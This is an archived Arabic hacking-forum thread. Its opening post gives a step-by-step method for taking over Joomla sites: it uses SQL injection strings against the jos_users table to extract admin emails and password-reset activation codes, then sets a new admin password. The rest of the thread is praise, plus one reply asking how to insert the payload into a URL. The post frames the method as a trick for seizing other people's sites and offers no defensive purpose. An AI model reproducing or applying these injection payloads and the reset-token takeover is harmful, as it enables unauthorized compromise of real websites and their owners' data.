المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : حقن و اختراق جوملة بدون الحاجة لفك الهاش --



Hidden pain
05-18-2011, 10:31 PM
السلام عليكم و رحمة الله تعالى و بركاته

طبعا الكل يعرف أنو معضم ثغرات الجوملة على مواقع الحماية سيكول
لكن تقريبا الكل يقف عند استخراج الهاش لأنو قليلا ما يمكن فكه
في هاذا الموضوع حبيت أطرح حيلة صغيرة تساعد على دعس الهدف


+union+select+1,concat_ws(username,0x3a,password), 3+from+jos_users--طبعا هاذي الحقنة عادي كما يعرفها الكل
و طلبنا فيها اليوزر و الباس
--
خلونا نطلب الإيميل بدل الباس

+union+select+1,concat_ws(username,0x3a,email),3+f rom+jos_users--لحد الآن كل شيئ بسيط
-
-
الخطوة اللي بعدها أنا نروح نقول لسكربت الجوملة أننا نسينا الباس
عبر هاذا الرابط

/index.php?option=com_user&view=resetنحط بيانات المدير و نضغط ok

رح يتم ارسال كود أكتفيشن ( activation ) لإيميل المدير

و رح يطلب منا السكربت الكود هاذا كي نستطيع إعادة وضع الباس

و هنا اللعبة
الكود هاذا ينزل على قاعدة البيانات أيضا .. يعني رح نجيبه بالحقن :tongue:

فقط هكذا

+union+select+1,concat_ws(email,0x3a,username,0x3a ,activation),3+from+jos_users--الآن كود الأكتفيشن عندك
روح اللوحة اللي وقفنا عندها بعد وضع بيانات المدير

و أعطيه كود الأكتفيشن
رح يقلك أعطيني الباس الجديد
حط باس من عندك ... و اسم المدير عندنا

مبروك عليك الموقع :tongue:

دمتم في رعاية الله

هاوي حنانك
05-18-2011, 11:34 PM
سلمت يمناك على هذا الموضوع الرااائع والمميز

شرح ولا أروع

دمت في تألق وابداع

wookr
05-19-2011, 01:15 AM
جزآك الله خيرٍ . .

وننتظر جديدكـُ . .

V!RUS TROJAN
05-19-2011, 02:09 AM
شرح ولا اروع يعطيك الف عافيه

واصل تقدمك وأبداعك

تحياتي لك

Resident Evil
05-19-2011, 04:52 AM
والله ابداااااااع يعطيك الف عافيه تستحق خمس نجوم

The shadow
05-23-2011, 12:03 AM
الله يعطيك العافية حيلة جدا ذكية موفق

Ace
08-13-2011, 05:02 AM
ولله قوية احسنت اخي

bestman
08-13-2011, 02:25 PM
مشكورررررررررررررررر

Lord_Ps
11-28-2011, 03:37 PM
والله خدعه جد جميله اخي
بجد والله انك تحفه
بارك الله فيك وادامك لاهلك والجيوش ادام اهلك لك
بالتوفيق حبيبي

The Haker Of Iraq
11-28-2011, 08:14 PM
تسلم شرح رائع
تقبل مروري

كووول1
11-29-2011, 07:30 PM
السلام عليكم

+union+select+1,concat_ws(username,0x3a,password), 3+from+jos_users--
هذا نخليه هيك

www.xxx.com/index.php+union+select+1,concat_ws(username,0x3a,p assword),3+from+jos_users--

????

The Haker Of Iraq
11-29-2011, 09:05 PM
الشرح جميل وحلو

شكراااااااااااااااااااااا ااااااااااااااااا